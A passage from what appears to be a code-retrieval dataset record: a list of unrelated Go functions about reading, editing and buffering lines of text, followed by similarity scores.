unread position\n\t\t\tif position+int64(offset) <= 0 {\n\t\t\t\tbuf = make([]byte, leftPosition)\n\t\t\t\tposition, err = file.Seek(0, io.SeekStart)\n\t\t\t\tleftPosition = 0\n\t\t\t} else {\n\t\t\t\tposition, err = file.Seek(offset, io.SeekCurrent)\n\t\t\t\tleftPosition = leftPosition - BufferLength\n\t\t\t}\n\t\t}\n\t\tif err != nil {\n\t\t\tbreak\n\t\t}\n\n\t\tbufLen, err = file.Read(buf)\n\t\tif err != nil {\n\t\t\tbreak\n\t\t} else if seekBack && leftPosition == 0 {\n\t\t\terr = io.EOF\n\t\t}\n\n\t\tfor i := 0; i < bufLen; i++ {\n\t\t\tiToCheck := i\n\t\t\tif seekBack {\n\t\t\t\tiToCheck = bufLen - i - 1\n\t\t\t}\n\t\t\tbyteToCheck := buf[iToCheck]\n\n\t\t\tif byteToCheck == lineSep {\n\t\t\t\tmatchCount++\n\t\t\t}\n\n\t\t\tif matchCount == lines {\n\t\t\t\tif seekBack {\n\t\t\t\t\treturn file.Seek(int64(i)*-1, io.SeekCurrent)\n\t\t\t\t}\n\t\t\t\treturn file.Seek(int64(bufLen*-1+i+1), io.SeekCurrent)\n\t\t\t}\n\t\t}\n\t}\n\n\tif err == io.EOF && !seekBack {\n\t\tposition, _ = file.Seek(0, io.SeekEnd)\n\t} else if err == io.EOF && seekBack {\n\t\tposition, _ = file.Seek(0, io.SeekStart)\n\n\t\t// no io.EOF err on SeekLine(0,0)\n\t\tif lines == 0 {\n\t\t\terr = nil\n\t\t}\n\t}\n\n\treturn position, err\n}", "func (m *Message) Write(line []byte) error {\n\tm.buffer.Write(line)\n\treturn nil\n}", "func (buf *CommandBuffer) End() error {\n\tres := Result(C.domVkEndCommandBuffer(buf.fps[vkEndCommandBuffer], buf.hnd))\n\treturn result2error(res)\n}", "func (ls *linestate) editSwap() {\n\tif ls.pos > 0 && ls.pos < len(ls.buf) {\n\t\ttmp := ls.buf[ls.pos-1]\n\t\tls.buf[ls.pos-1] = ls.buf[ls.pos]\n\t\tls.buf[ls.pos] = tmp\n\t\tif ls.pos != len(ls.buf)-1 {\n\t\t\tls.pos++\n\t\t}\n\t\tls.refreshLine()\n\t}\n}", "func (ls *linestate) editDelete() {\n\tif len(ls.buf) > 0 && ls.pos < len(ls.buf) {\n\t\tls.buf = append(ls.buf[:ls.pos], ls.buf[ls.pos+1:]...)\n\t\tls.refreshLine()\n\t}\n}", "func (p *Parser) FlushToNewline() {\n\tfor p.curTok.Type != token.Newline && p.curTok.Type != token.EOF {\n\t\tp.nextErrorOut(false)\n\t}\n}", "func (v *VerbalExpression) EndOfLine() *VerbalExpression {\n\tif !strings.HasSuffix(v.suffixes, \"$\") {\n\t\tv.suffixes += \"$\"\n\t}\n\treturn v\n}", "func (l *lexer) readLines() error {\n\tl.reset()\n\tln, _, err := l.bufReader.ReadLine()\n\tif err != nil {\n\t\tlog.Printf(\"Error: bufio.ReadLine: %v\\n\", err)\n\t}\n\tl.currentLine = l.nextLine\n\tl.nextLine = strings.TrimSpace(string(ln))\n\treturn err\n}", "func (i *Input) Buffer() Buffer {\n\tbuf := i.Block.Buffer()\n\n\t// offset used to display the line numbers\n\ttextXOffset := 0\n\n\tbufferLines := i.lines[:]\n\tfirstLine := 0\n\tlastLine := i.innerArea.Dy()\n\tif i.IsMultiLine {\n\t\tif i.cursorLineIndex >= lastLine {\n\t\t\tfirstLine += i.cursorLineIndex - lastLine + 1\n\t\t\tlastLine += i.cursorLineIndex - lastLine + 1\n\t\t}\n\n\t\tif len(i.lines) < lastLine {\n\t\t\tbufferLines = i.lines[firstLine:]\n\t\t} else {\n\t\t\tbufferLines = i.lines[firstLine:lastLine]\n\t\t}\n\t}\n\n\tif i.ShowLineNo {\n\t\t// forcing space for up to 1K\n\t\tif lastLine < LINE_NO_MIN_SPACE {\n\t\t\ttextXOffset = len(strconv.Itoa(LINE_NO_MIN_SPACE)) + 2\n\t\t} else {\n\t\t\ttextXOffset = len(strconv.Itoa(lastLine)) + 2 // one space at the beginning and one at the end\n\t\t}\n\t}\n\n\ttext := strings.Join(bufferLines, NEW_LINE)\n\n\t// if the last line is empty then we add a fake space to make sure line numbers are displayed\n\tif len(bufferLines) > 0 && bufferLines[len(bufferLines)-1] == \"\" && i.ShowLineNo {\n\t\ttext += \" \"\n\t}\n\n\tfg, bg := i.TextFgColor, i.TextBgColor\n\tcs := i.TextBuilder.Build(text, fg, bg)\n\ty, x, n := 0, 0, 0\n\tlineNoCnt := 1\n\n\tfor n < len(cs) {\n\t\tw := cs[n].Width()\n\n\t\tif x == 0 && i.ShowLineNo {\n\t\t\tcurLineNoString := \" \" + strconv.Itoa(lineNoCnt) +\n\t\t\t\tstrings.Join(make([]string, textXOffset-len(strconv.Itoa(lineNoCnt))-1), \" \")\n\t\t\t//i.debugMessage = \"Line no: \" + curLineNoString\n\t\t\tcurLineNoRunes := i.TextBuilder.Build(curLineNoString, fg, bg)\n\t\t\tfor lineNo := 0; lineNo < len(curLineNoRunes); lineNo++ {\n\t\t\t\tbuf.Set(i.innerArea.Min.X+x+lineNo, i.innerArea.Min.Y+y, curLineNoRunes[lineNo])\n\t\t\t}\n\t\t\tlineNoCnt++\n\t\t}\n\n\t\tif cs[n].Ch == '\\n' {\n\t\t\ty++\n\t\t\tn++\n\t\t\tx = 0 // set x = 0\n\t\t\tcontinue\n\t\t}\n\t\tbuf.Set(i.innerArea.Min.X+x+textXOffset, i.innerArea.Min.Y+y, cs[n])\n\n\t\tn++\n\t\tx += w\n\t}\n\n\tcursorXOffset := i.X + textXOffset\n\tif i.BorderLeft {\n\t\tcursorXOffset++\n\t}\n\n\tcursorYOffset := i.Y// termui.TermHeight() - i.innerArea.Dy()\n\tif i.BorderTop {\n\t\tcursorYOffset++\n\t}\n\tif lastLine > i.innerArea.Dy() {\n\t\tcursorYOffset += i.innerArea.Dy() - 1\n\t} else {\n\t\tcursorYOffset += i.cursorLineIndex\n\t}\n\tif i.IsCapturing {\n\t\ti.CursorX = i.cursorLinePos+cursorXOffset\n\t\ti.CursorY = cursorYOffset\n\t\ttermbox.SetCursor(i.cursorLinePos+cursorXOffset, cursorYOffset)\n\t}\n\n\t/*\n\t\tif i.DebugMode {\n\t\t\tposition := fmt.Sprintf(\"%s li: %d lp: %d n: %d\", i.debugMessage, i.cursorLineIndex, i.cursorLinePos, len(i.lines))\n\n\t\t\tfor idx, char := range position {\n\t\t\t\tbuf.Set(i.innerArea.Min.X+i.innerArea.Dx()-len(position) + idx,\n\t\t\t\t\ti.innerArea.Min.Y+i.innerArea.Dy()-1,\n\t\t\t\t\tCell{Ch: char, Fg: i.TextFgColor, Bg: i.TextBgColor})\n\t\t\t}\n\t\t}\n\t*/\n\treturn buf\n}", "func (ep *ExpectProcess) ReadLine() string {\n\tep.mu.Lock()\n\tdefer ep.mu.Unlock()\n\tif ep.count > ep.cur {\n\t\tline := ep.lines[ep.cur]\n\t\tep.cur++\n\t\treturn line\n\t}\n\treturn \"\"\n}", "func ChopLineEnding(s string) string {\n\tif len(s) >= 2 && s[len(s)-2:] == \"\\r\\n\" { // Windows line ending\n\t\treturn s[:len(s)-2]\n\t} else if len(s) >= 1 && s[len(s)-1] == '\\n' { // Unix line ending\n\t\treturn s[:len(s)-1]\n\t}\n\treturn s\n}", "func (l *LexInner) Back() {\n\tif l.Last() == '\\n' {\n\t\tl.mark.line--\n\t}\n\tl.mark.pos -= l.mark.width\n\tl.mark.width = 0\n}", "func (io *Io) NextLine() string {\n\tvar buffer []byte\n\tfor {\n\t\tline, isPrefix, err := io.reader.ReadLine()\n\t\tif err != nil {\n\t\t\tpanic(err)\n\t\t}\n\t\tbuffer = append(buffer, line...)\n\t\tif !isPrefix {\n\t\t\tbreak\n\t\t}\n\t}\n\treturn string(buffer)\n}", "func (_this *StreamingReadBuffer) Refill(position int) (positionOffset int) {\n\tif _this.isEOF {\n\t\treturn\n\t}\n\n\t_this.moveUnreadBytesToStart(position)\n\t_this.readFromReader(len(_this.Buffer))\n\tpositionOffset = -position\n\treturn\n}", "func (r renderer) LineBreak(out *bytes.Buffer) {}", "func TestLineBufferSequential(t *testing.T) {\n\tsrc := &sourceTailer{lines: make(chan string)}\n\tbuffered := BufferedTailerWithMetrics(src)\n\tfor i := 0; i < 10000; i++ {\n\t\tsrc.lines <- fmt.Sprintf(\"This is line number %v.\", i)\n\t}\n\tfor i := 0; i < 10000; i++ {\n\t\tline := <-buffered.Lines()\n\t\tif line != fmt.Sprintf(\"This is line number %v.\", i) {\n\t\t\tt.Errorf(\"Expected 'This is line number %v', but got '%v'.\", i, line)\n\t\t}\n\t}\n\tbuffered.Close()\n\t_, stillOpen := <-buffered.Lines()\n\tif stillOpen {\n\t\tt.Error(\"Buffered tailer was not closed.\")\n\t}\n\t_, stillOpen = <-src.Lines()\n\tif stillOpen {\n\t\tt.Error(\"Source tailer was not closed.\")\n\t}\n}", "func srcLine(src []byte, p token.Position) string {\n\t// Run to end of line in both directions if not at line start/end.\n\tlo, hi := p.Offset, p.Offset+1\n\tfor lo > 0 && src[lo-1] != '\\n' {\n\t\tlo--\n\t}\n\tfor hi < len(src) && src[hi-1] != '\\n' {\n\t\thi++\n\t}\n\treturn string(src[lo:hi])\n}", "func (b *Buffer) Reset() {\n\tb.B = b.B[:0]\n}", "func MessageLastBeforeEndOfLine(vm *VM, target, locals Interface, msg *Message) Interface {\n\tm := target.(*Message)\n\tfor !m.Next.IsTerminator() {\n\t\tm = m.Next\n\t}\n\treturn m\n}", "func (tb *TextBuf) AppendTextLine(text []byte, saveUndo, signal bool) *TextBufEdit {\n\ted := tb.EndPos()\n\tsz := len(text)\n\taddLF := false\n\tif sz > 0 {\n\t\tif text[sz-1] != '\\n' {\n\t\t\taddLF = true\n\t\t}\n\t} else {\n\t\taddLF = true\n\t}\n\tefft := text\n\tif addLF {\n\t\ttcpy := make([]byte, sz+1)\n\t\tcopy(tcpy, text)\n\t\ttcpy[sz] = '\\n'\n\t\tefft = tcpy\n\t}\n\ttbe := tb.InsertText(ed, efft, saveUndo, signal)\n\treturn tbe\n}", "func (buf *Buf) AppendLine(s string) {\n\tbn := NewBufLineNode(s)\n\tbuf.appendNode(bn)\n}", "func (tv *TextView) JumpToLine(ln int) {\n\twupdt := tv.TopUpdateStart()\n\ttv.SetCursorShow(TextPos{Ln: ln - 1})\n\ttv.SavePosHistory(tv.CursorPos)\n\ttv.TopUpdateEnd(wupdt)\n}", "func (c *Conn) readLine() (string, error) {\n\tif c.server.ReadTimeout != 0 {\n\t\tif err := c.conn.SetReadDeadline(time.Now().Add(c.server.ReadTimeout)); err != nil {\n\t\t\treturn \"\", err\n\t\t}\n\t}\n\n\treturn c.text.ReadLine()\n}", "func (b *RecordBuffer) Flush() {\n\tb.recordsInBuffer = b.recordsInBuffer[:0]\n\tb.sequencesInBuffer = b.sequencesInBuffer[:0]\n}", "func (e *ObservableEditableBuffer) ResetBuffer() {\n\te.filtertagobservers = false\n\te.seq = 0\n\te.f = NewTypeBuffer([]rune{}, e)\n}", "func (c *Conn) end(data []byte) {\n\tif len(data) > 0 {\n\t\tif len(data) != len(c.in) {\n\t\t\tc.in = append(c.in[:0], data...)\n\t\t}\n\t} else if len(c.in) > 0 {\n\t\tc.in = c.in[:0]\n\t}\n\n\t//if len(c.out) > 0 {\n\t//\tc.outb = c.out\n\t//\tc.out = nil\n\t//}\n}" ]
[ "0.7160396", "0.6042775", "0.6032601", "0.5990435", "0.59048235", "0.58782816", "0.5877553", "0.578516", "0.5618679", "0.55800724", "0.5567242", "0.5558867", "0.5543684", "0.55424917", "0.55307984", "0.55307984", "0.5504199", "0.5459268", "0.5456745", "0.5402668", "0.5394385", "0.5393694", "0.53774816", "0.53561974", "0.5351012", "0.5313545", "0.52950823", "0.5293783", "0.52508533", "0.52366966", "0.52182615", "0.5217899", "0.52143455", "0.521239", "0.51889014", "0.5180682", "0.5180253", "0.5175718", "0.5168827", "0.5165214", "0.5157601", "0.51553524", "0.5148703", "0.5147213", "0.5142287", "0.51388514", "0.5109723", "0.51085275", "0.5098195", "0.50848323", "0.5080353", "0.5076268", "0.50745577", "0.5060797", "0.50467205", "0.50458217", "0.50426406", "0.5025379", "0.5022826", "0.50148743", "0.500099", "0.49938688", "0.4982517", "0.4982208", "0.4979357", "0.4959606", "0.49577302", "0.49530524", "0.49525982", "0.49429515", "0.49367338", "0.4931301", "0.4929655", "0.49290875", "0.4921092", "0.4919092", "0.49162737", "0.4911429", "0.49100393", "0.49085653", "0.49045804", "0.4890829", "0.48805127", "0.48802927", "0.4865163", "0.4863195", "0.4861601", "0.48567754", "0.4827305", "0.48269466", "0.48229185", "0.48196846", "0.48123807", "0.4805488", "0.4804278", "0.48036328", "0.47987556", "0.47942844", "0.47941202", "0.4793867" ]
0.6757685
1